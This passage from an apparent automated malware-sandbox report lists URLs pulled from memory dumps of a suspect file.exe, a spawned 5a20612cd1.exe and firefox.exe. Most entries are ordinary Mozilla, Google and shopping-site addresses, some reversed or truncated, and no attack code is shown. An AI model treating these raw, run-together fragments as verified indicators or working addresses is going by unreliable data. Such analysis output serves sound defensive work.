Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.rec.impressions
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.rec.impressionsABOUT_SPONSORED_TOP_SITESabout:prefer
Source: firefox.exe, 0000001F.00000002.2931152196.00000294ADF43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2926644947.00000294AD16B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001F.00000002.2931152196.00000294ADF43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2926644947.00000294AD16B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 5a20612cd1.exe, 00000011.00000003.2761016578.00000000057E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001F.00000002.2933221891.00000294AE153000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2908716384.00000294AC55E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 5a20612cd1.exe, 00000011.00000003.2869633293.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B46D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpDid
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963998272.00000294AEB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsUpdateService:_registerOnli
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesSELECT
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: 5a20612cd1.exe, 00000011.00000003.2869633293.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2097723660.000000000C6AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B46D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1948031663.00000000061DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp, 5a20612cd1.exe, 00000011.00000003.2761445182.0000000005786000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2761016578.00000000057E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: 5a20612cd1.exe, 00000011.00000003.2761445182.0000000005762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016HZhJogON
Source: file.exe, 00000000.00000003.1948031663.00000000061DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp, 5a20612cd1.exe, 00000011.00000003.2761445182.0000000005786000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2761016578.00000000057E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 5a20612cd1.exe, 00000011.00000003.2761445182.0000000005762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A8511000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A852C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A8511000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A852C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A8511000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A852C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A8511000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A852C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001F.00000002.2921314720.00000294ACE5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B4603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/Z
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B435C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001F.00000002.2993230028.00000294B4727000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 0000001F.00000002.2921314720.00000294ACE5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B4603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2215093487.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8626000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACEC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A922C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2215093487.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A9203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B435C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001F.00000003.2839121316.00000294B478D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2838024515.00000294B4298000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001F.00000003.2762399051.00000294ABF77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B445D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 5a20612cd1.exe, 00000011.00000003.2759178373.0000000005778000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2758760881.00000000057E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001F.00000003.2762399051.00000294ABF77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2844134582.00000294ADE66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2895107226.00000294A924C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2902018660.00000294AB770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8626000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACEC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761534873.00000294ABF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761201786.00000294ABD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2761868239.00000294ABF3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2762122666.00000294ABF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001F.00000003.2844134582.00000294ADE66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchhttps://www.google.com/search
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 0000001F.00000002.2895107226.00000294A92A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: 5a20612cd1.exe, 00000011.00000003.2869633293.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B46D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
